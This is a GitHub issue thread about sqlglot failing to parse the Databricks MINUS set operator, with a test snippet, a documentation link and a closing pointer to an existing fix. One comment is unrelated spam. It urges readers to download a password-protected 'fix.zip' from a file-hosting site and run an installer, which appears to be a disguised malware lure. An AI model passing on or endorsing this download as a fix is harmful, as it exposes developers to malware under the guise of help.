### ISSUE TITLE
MINUS databricks keyword not supported 

### ISSUE THREAD

**Issue by ericvergnaud** [tobymao/sqlglot#3970]
**Fully reproducible code snippet**
```
def test_sqlglot_fails_to_parse_sql_with_minus(migration_index):
    code = "SELECT s FROM n1 MINUS SELECT s FROM n2"  # not supported by sqlglot
    with pytest.raises(SqlParseError):
        _ = parse_sql(code, read='databricks')

```
(works with  "SELECT s FROM n1 EXCEPT SELECT s FROM n2")

**Official Documentation**
Official doc here https://docs.databricks.com/en/sql/language-manual/sql-ref-syntax-qry-select-setops.html says that `You can specify MINUS as a syntax alternative for EXCEPT`

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ericvergnaud** [comment]
Seems it's already fixed, see https://github.com/tobymao/sqlglot/pull/3932
